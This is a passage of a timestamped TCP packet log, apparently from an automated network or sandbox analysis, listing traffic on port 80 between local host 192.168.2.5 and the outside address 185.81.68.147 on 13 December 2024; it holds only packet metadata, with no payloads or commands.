                                                                                                                                                                Dec 13, 2024 01:37:36.030286074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030311108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030333042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030359983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030391932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030391932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030427933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030427933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030467033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030467033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030488014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030522108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030522108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030559063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030559063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030605078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030605078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030637026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030694008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030694008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030694962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030738115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030738115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030770063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030798912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030798912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030843019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030843019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030884027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030884027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030920982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030920982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030961037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.030961037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031008005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031008959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031039953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031070948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031100035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031131983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031172991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031209946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031209946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031246901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031246901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031277895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031277895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031308889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031378031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031378031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031378031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031416893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031416893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031455040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031455040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031492949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031492949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031524897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031524897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031560898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031560898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031598091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031598091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031635046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031635046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031666040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031666040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031702042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.031702042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.033349991 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033417940 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033679008 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033705950 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033715963 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033744097 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033780098 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033865929 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033874989 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.033880949 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.037722111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.037758112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.037758112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.037822962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.037858009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.037889004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.037911892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038109064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038146973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038177967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038213968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038213968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038245916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038264036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038285971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038314104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038346052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038346052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038383007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038383007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038423061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038423061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038455009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038568974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038605928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038605928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038633108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038651943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038671017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038690090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038724899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038724899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038762093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038763046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038781881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038811922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038837910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038870096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038888931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.038918972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039068937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039104939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039104939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039135933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039166927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039199114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039264917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039264917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039298058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039350986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039351940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039351940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039388895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039411068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039437056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039469957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039469957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039510012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039510012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039540052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039575100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039575100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039752007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039788961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039788961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039813995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039834023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039868116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039901018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039901018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039942026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039942026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039961100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039978027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.039994955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040016890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040039062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040067911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040186882 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040224075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040224075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040316105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040354013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040433884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040467024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040467024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040522099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040560007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040620089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040620089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040652037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040672064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040692091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.040724039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041063070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041099072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041099072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041126013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041146994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041250944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041285038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041285038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041320086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041320086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041347027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041366100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041400909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041402102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041436911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041436911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041456938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041474104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041502953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041503906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041549921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041549921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041580915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041610003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041640043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041659117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041695118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041695118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041726112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041758060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041758060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041795015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041795015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041836023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041856050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041887045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041887045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041934013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041934013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.041934013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042021990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042068958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042104006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042145014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042188883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042222977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042222977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042259932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042259932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042292118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042309999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042347908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042391062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042437077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042437077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042474985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042474985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042553902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042591095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042591095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042627096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042628050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042648077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042665005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042690992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042721987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042722940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042747974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042767048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042818069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042850018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042880058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042912006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042912006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.042947054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043095112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043144941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043221951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043255091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043289900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043289900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043354034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043389082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043390036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043416023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043438911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043462038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043488026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043518066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043549061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043550014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043577909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043596983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043622017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043646097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043673038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043704033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043735981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043776035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043776035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043814898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043814898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043845892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043870926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043872118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043912888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043912888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043945074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043972969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.043999910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044028997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044060946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044087887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044112921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044131994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044159889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044195890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044195890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044226885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044244051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044276953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044303894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044333935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044364929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044394016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044451952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.044481993 CET4977580192.168.2.5185.81.68.147
